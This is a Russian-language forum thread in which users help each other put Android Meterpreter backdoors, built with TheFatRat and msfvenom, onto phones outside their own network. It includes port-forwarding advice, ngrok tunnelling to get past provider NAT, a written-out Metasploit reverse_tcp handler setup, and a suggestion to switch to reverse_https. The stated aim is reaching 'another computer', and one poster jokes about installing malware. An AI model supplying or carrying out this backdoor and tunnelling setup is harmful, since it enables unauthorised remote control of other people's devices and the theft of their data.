![]() |
Кто может продробно рассказать, как сделать проброс кали за nat, использую ее на virtualbox, сколько искал инфы не нашел!!!
|
скорее порты, тут дело в том, что хочу попробовать backdoor на другом компьютере не в локальной сети
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
У тебя вируталка стоит на NAT - поставь сетевой мост, тем более у тебя андроид в одной сети. Ничего пробрасывать не надо. опиши подробную схему, которую ты желаешь реализовать. |
Цитата:
|
Цитата:
|
Цитата:
2) приложение бекдор для андроид может не сработать, сейчас надо учитывать такие факторы как ОС, телефон и т.д - просто содать apk и на - в 75% не катят. Тренеруйся на своем. 3) Тему с ТОР не рекомендую - крайне не стабильно 4) В каяестве реверса пробовать надо все и tcp и https |
Цитата:
|
Цитата:
2) делаем проброс 80 порта на порт 9999 ( 80 это локальный и 9999 внешний ) 3) Подключаем свой смартфон к 3G инету ( без домашнего WiFi) 4) Узнаем свой IP в Инете 5) Пробуем браузером в смарте http://твой_Ip:9999 смотрим |
Цитата:
узнал ip через 2ip выдало вот это |
Цитата:
|
Цитата:
|
Открой бразуером index.html
|
Цитата:
|
А если взять браузер и открыть локально? К примеру с браузера винды но http://ip тачки с Линукс порт по умолчанию 80
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
запустил, ввел ip получилось это
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
set payload android/meterpreter/reverse_tcp set lhost 192.168.**.** set lport 9999 exploit -j все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется apk файл я создаю с помощью fatrat |
Цитата:
И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
У меня кстати, такая же проблема! Думаю проблема в модеме, который от МТС 3/4g! Я пробросил порт, создал правила + через cmd netsh, и порты менял и головой об стенку бился))) В итоге на 2ip при проверке открытия порта они рекламировали сервис hideme, при установки их клиента можно делать forwarding port ( пробросить порт) но их манагеры сразу мне голову съели что мол для какой игры, итд! Когда речь зашла что я верталетики устанавливаю) Они отключились))) ПРОСТО ТУПО ВЫКЛЮЧИЛИ ДИАЛОГ НА СТРАНИЦЕ))) Я ржал!))) Так вот, именно только эта схема сразу мне все сессии подарила! Далее, я стал разбираться в чем проблема, я и порты менял и систему раза 3 переустановил (правда виндовоз) и прогу пробывал PFPort как то так! Итог - нифига! Думаю модем мой Гауно) Хотя там пробросил все в разделе виртуальный сервер итд! Не помогло! И перегружал! так что буду следить за топиком! Может кто какую тулзу посоветует!
|
Если брать в пример обычную структуру сети [ВЫ]===>[РОУТЕР]====>INTERNET, то все выглядит так:
[ВЫ - в метасплоит указать свой локальный IP выданный роутером в локалке ]===>[РОУТЕР - сделать проброс порта : указать порт выбранный в параметрах метасплоит и указать какой порт надо открыть в для доступа из Инета]====>INTERNET при создании полезной нагрузки для работы через Интернет надо вписывать ip адрес роутера в Инете и порт. |
Народ! если кому интересно, то я разобрался малеха. за пределами фаервола вашего роута (на котором вы прокидываете порты) стоит еще один глобальный роутер(со своим фаерволом)!! через него не пройдет ни одна скатина. это роутер вашего провайдера. в итоге вы получается находитесь в локальной сети. доступ к вам пакетов из инета невозможен но есть выход. ngrok. установил на кали, зарегался, и нгрок дал мне обходной путь моего провайдера. он создал свой ип, который сидит на дефолтном порту, и перенаправляет мне на 192.168.1.1 по порту 4444 . вот такая делюга. создал пейлоад на андроид(указал айпишник нгрока), запустил. включил слушатель хендлер. слушаю 192.168.1.1. на порту 4444. прилетает сессия. но не открывается метерпретер.... счас вас почитал, что то там вместо msfvenom -p android/meterpreter/reverse_tsp нужно msfvenom -p android/meterpreter/reverse_https ..... немного не понятно. но нужно попробовать... если кто вкуривает подскажите..... если кому интересно про нгрок, распишу подробнее
|
| Время: 18:18 |